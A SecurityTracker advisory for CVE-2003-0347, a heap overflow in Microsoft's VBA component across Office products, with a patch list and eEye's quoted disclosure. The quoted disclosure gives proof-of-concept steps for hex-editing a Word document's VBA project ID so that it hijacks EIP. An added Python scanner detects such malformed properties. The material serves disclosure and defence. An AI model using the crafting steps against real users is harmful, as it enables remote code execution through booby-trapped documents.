SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Generic)  >   Microsoft Word
Vendors:   Microsoft
(Microsoft Word is Vulnerable) Microsoft Visual Basic for Applications (VBA) in Multiple Microsoft Products Permits Remote Code Execution
SecurityTracker Alert ID:  1007639
SecurityTracker URL:  http://securitytracker.com/id/1007639
CVE Reference:   CVE-2003-0347
Date:  Sep 4 2003
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 97, 98 (J), 2000, 2002
Description:   A vulnerability was reported in Microsoft Visual Basic for Applications (VBA), affecting a large number of Microsoft applications. A remote user can cause an affected application to execute arbitrary code.

eEye Digital Security reported that VBA does not properly check certain document properties passed to VBA by the host application. A remote user can create a document that, when opened by the target user, calls VBA with specially crafted parameters to trigger a buffer overflow and execute arbitrary code. The code will run with the privileges of the target user.

According to the report, a heap overflow resides in VBE.DLL and VBE6.DLL. The overflow can be triggered when a malicious Microsoft Office file (e.g., ".doc", ".xls") is opened. This can be exploited via Internet Explorer (IE), as IE relies on helper applications that use VBA, the report stated.

Some demonstration exploit steps are described in the Source Message.

The following products use the vulnerable VBA component and, as a result, are vulnerable:

* Microsoft Access 97
* Microsoft Access 2000
* Microsoft Access 2002
* Microsoft Excel 97
* Microsoft Excel 2000
* Microsoft Excel 2002
* Microsoft PowerPoint 97
* Microsoft PowerPoint 2000
* Microsoft PowerPoint 2002
* Microsoft Project 2000
* Microsoft Project 2002
* Microsoft Publisher 2002
* Microsoft Visio 2000
* Microsoft Visio 2002
* Microsoft Word 97
* Microsoft Word 98(J)
* Microsoft Word 2000
* Microsoft Word 2002
* Microsoft Works Suite 2001
* Microsoft Works Suite 2002
* Microsoft Works Suite 2003
* Microsoft Business Solutions Great Plains 7.5
* Microsoft Business Solutions Dynamics 6.0
* Microsoft Business Solutions Dynamics 7.0
* Microsoft Business Solutions eEnterprise 6.0
* Microsoft Business Solutions eEnterprise 7.0
* Microsoft Business Solutions Solomon 4.5
* Microsoft Business Solutions Solomon 5.0
* Microsoft Business Solutions Solomon 5.5

Impact:   A remote user can create a malicious document that, when opened on the target system, will execute arbitrary code with the privileges of the target user.
Solution:   The vendor has released the following patches. There are several versions available. Make sure that you apply the proper patch.

For Microsoft Office 2000:

http://microsoft.com/downloads/details.aspx?FamilyId=E2CCE199-9C4A-4EEC-A3EC-9F738017F275&displaylang=en


For Microsoft Office XP (including Publisher 2002):

http://microsoft.com/downloads/details.aspx?FamilyId=6F1FC4B0-29E9-44E0-A33D-AD6B4B6A8FF4&displaylang=en


For Microsoft Project 2000:

http://microsoft.com/downloads/details.aspx?FamilyId=E53A52E7-431D-4580-9733-B92A2B7BFD0D&displaylang=en


For Microsoft Project 2002:

http://microsoft.com/downloads/details.aspx?FamilyId=525BDE0A-0028-488A-8209-6E07D4603CCB&displaylang=en


For Microsoft Visio 2002:

http://microsoft.com/downloads/details.aspx?FamilyId=55944490-13C2-4043-BA2A-17AF02E9C73E&displaylang=en

For Microsoft VBA Patch:

http://microsoft.com/downloads/details.aspx?FamilyId=DA1A7ABA-CD3D-458B-9729-AB9094C9BD3F&displaylang=en


Microsoft recommends that users visit Office Update to install the patch:

http://www.office.microsoft.com/ProductUpdates/default.aspx


According to the report, the Microsoft Office 2000 patch can be installed on Microsoft Office 2000 SP3. The Microsoft Office XP patch can reportedly be installed on Microsoft Office XP SP2, Microsoft Works 2002, and Microsoft Works 2003. The Microsoft Visio 2002 patch can be installed on Microsoft Visio 2002.

The Microsoft VBA patch can reportedly be installed on:

Microsoft VBA 5.0
Microsoft VBA 6.0
Microsoft VBA 6.2
Microsoft VBA 6.3
Microsoft Access 97
Microsoft Excel 97
Microsoft PowerPoint 97
Microsoft Word 97
Microsoft Word 98(J)
Microsoft Visio 2000
Microsoft Works Suite 2001
Microsoft Business Solutions Great Plains 7.5
Microsoft Business Solutions Dynamics 6.0
Microsoft Business Solutions Dynamics 7.0
Microsoft Business Solutions eEnterprise 6.0
Microsoft Business Solutions eEnterprise 7.0
Microsoft Business Solutions Solomon 4.5
Microsoft Business Solutions Solomon 5.0
Microsoft Business Solutions Solomon 5.5

A reboot is required after installation if 'vbe.dll' or 'vbe6.dll' is in use when the patch is installed.

Microsoft has issued Knowledge Base article 822715 regarding this flaw:

http://support.microsoft.com/default.aspx?scid=kb;en-us;822715

Vendor URL:  www.microsoft.com/technet/security/bulletin/MS03-037.asp
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Sep 3 2003 Microsoft Visual Basic for Applications (VBA) in Multiple Microsoft Products Permits Remote Code Execution



 Source Message Contents

Subject:  EEYE: VBE Document Property Buffer Overflow


VBE Document Property Buffer Overflow

Release Date:
September 3, 2003

Reported Date:
May 7, 2003

Severity:
High (Code Execution)

Systems Affected:
Microsoft Access 97, 2000, 2002
Microsoft Excel 97, 2000, 2002
Microsoft PowerPoint 97, 2000, 2002
Microsoft Project 2000, 2002
Microsoft Publisher 2002
Microsoft Visio 2000, 2002
Microsoft Word 97, 98(J), 2000, 2002
Microsoft Works Suite 2001, 2002, 2003
Microsoft Business Solutions Great Plains 7.5
Microsoft Business Solutions Dynamics 6.0, 7.0
Microsoft Business Solutions eEnterprise 6.0, 7.0
Microsoft Business Solutions Solomon 4.5, 5.0, 5.5

Description:

The Visual Basic Design Time Environment library (VBE.DLL and VBE6.DLL),
used by the Microsoft Office series and other Microsoft applications,
contains an exploitable heap overflow vulnerability. If a malicious Office
file such as ".doc", ".xls", etc. is opened, there is the ability for an
attacker to execute arbitrary code. This buffer overflow bug also affects
Internet Explorer, because some Office files are executed automatically by a
helper-application when these files are received.

Technical Description:

[Technical data may wrap in eMail. Please visit our website.]

The following steps can be performed in order to create a proof-of-concept
Word document:

1. Open Word.
2. Select "Insert" - "Object"
3. Select "MSPropertyTreeCtl Class" (You can also select other objects such
as ChoiceBox Class, etc)
4. Save .doc file.
5. Modify .doc file by using binary editor as follows:

5a. Find following strings in doc file.

ID="{1FE45957-2625-4B1E-ADEF-EC04B7F34CCF}"
Document=ThisDocument/&H00000000
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="1E1C0125015D1B611B611B611B61"
DPB="4B4954458046804680"
GC="787A679868986867"

5b. Change "ID" from:

 +0000  49 44 3D 22 7B 31 46 45 34 35 39 35 37 2D 32 36   ID="{1FE45957-26
 +0010  32 35 2D 34 42 31 45 2D 41 44 45 46 2D 45 43 30   25-4B1E-ADEF-EC0
 +0020  34 42 37 46 33 34 43 43 46 7D 22 0D 0A 44 6F 63   4B7F34CCF}"..Doc
 +0030  75 6D 65 6E 74 3D 54 68 69 73 44 6F 63 75 6D 65   ument=ThisDocume

to the following:

 +0000  49 44 3D 22 7B 61 61 61 61 61 61 61 61 61 61 61   ID="{aaaaaaaaaaa
 +0010  61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61   aaaaaaaaaaaaaaaa
 +0020  61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61   aaaaaaaaaaaaaaaa
 +0030  61 61 61 61 41 42 43 44 00 00 00 00               aaaaABCD....

6. Open modified doc file.
7. You'll be able to see an access violation such as...

65106055 FF 52 0C   call        dword ptr [edx+0Ch]

 EAX = 023219A4 EBX = 0232194B ECX = 02311AC4
 EDX = 44434241 ESI = 0231186C EDI = 02321940
 EIP = 65106055 ESP = 0012CBA0 EBP = 0012CBB8

We can set any value in the EDX register, so we can control the EIP register.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.

Vendor Status:
Microsoft was notified on May 7, 2003, and has released a patch for this
vulnerability. The patch is available at:
http://www.microsoft.com/technet/security/bulletin/MS03-037.asp

Credit:
Yuji "The Ninja" Ukai, eEye Digital Security

Related Links:
Retina Network Security Scanner - Free 15 Day Trial
http://www.eeye.com/html/Products/Retina/index.html

Greetings:
Shanti, Yukkie, TEX, Sakuranamiki people, AD200X people

Copyright (c) 1998-2003 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
http://www.eEye.com
info@eEye.com
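As an added example (not code from SecurityTracker or eEye), the following Python scanner checks the VBA project property lines shown in steps 5a and 5b above for an ID value that is not a well-formed quoted GUID, for embedded NUL bytes and for overlong values. It assumes the property text is contiguous in the file (for a real .doc the PROJECT stream would first be extracted from the OLE container), and the 256-byte bound on the other properties is an assumed sanity limit, not a documented one.

```python
import re

# VBA project properties are "Key=Value" lines ended by CRLF; the keys below
# are the ones shown in step 5a of the advisory.
KNOWN_KEYS = {b'ID', b'Document', b'Name', b'HelpContextID',
              b'VersionCompatible32', b'CMG', b'DPB', b'GC'}
PROPERTY_LINE = re.compile(rb'([A-Za-z][A-Za-z0-9]*)=([^\r\n]*)')
# A legitimate ID is a quoted, braced GUID: 38 characters plus two quotes.
QUOTED_GUID = re.compile(
    rb'^"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}"$')
MAX_VALUE_LEN = 256  # assumed sanity bound for the other properties

def check_vba_properties(data: bytes) -> list:
    """Return (key, reason) findings for property values that do not look benign.
    An empty list means every known property had its expected shape."""
    findings = []
    for m in PROPERTY_LINE.finditer(data):
        key, value = m.group(1), m.group(2)
        if key not in KNOWN_KEYS:
            continue  # not one of the project properties we recognise
        name = key.decode('ascii')
        if key == b'ID' and not QUOTED_GUID.match(value):
            findings.append((name, f'not a quoted GUID ({len(value)} bytes)'))
        elif key != b'ID' and len(value) > MAX_VALUE_LEN:
            findings.append((name, f'value is {len(value)} bytes long'))
        if b'\x00' in value:
            findings.append((name, 'contains NUL bytes'))
    return findings

# Constructed sample: the property block from step 5a of the advisory.
BENIGN_PROJECT = (
    b'ID="{1FE45957-2625-4B1E-ADEF-EC04B7F34CCF}"\r\n'
    b'Document=ThisDocument/&H00000000\r\n'
    b'Name="Project"\r\n'
    b'HelpContextID="0"\r\n'
    b'VersionCompatible32="393222000"\r\n'
    b'CMG="1E1C0125015D1B611B611B611B61"\r\n'
    b'DPB="4B4954458046804680"\r\n'
    b'GC="787A679868986867"\r\n'
)
# Constructed sample: the same block after step 5b. 47 'a' bytes, "ABCD" and
# four NULs overwrite the GUID, its closing quote, the CRLF and the start of
# the Document line, so only the tail of that line survives.
OVERFLOWED_PROJECT = (
    b'ID="{' + b'a' * 47 + b'ABCD' + b'\x00' * 4 + b'cument/&H00000000\r\n'
    + BENIGN_PROJECT.split(b'\r\n', 2)[2])

if __name__ == '__main__':  # stand-alone run: report on both constructed samples
    print(check_vba_properties(BENIGN_PROJECT), check_vba_properties(OVERFLOWED_PROJECT))
```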

Copyright 2019, SecurityGlobal.net LLC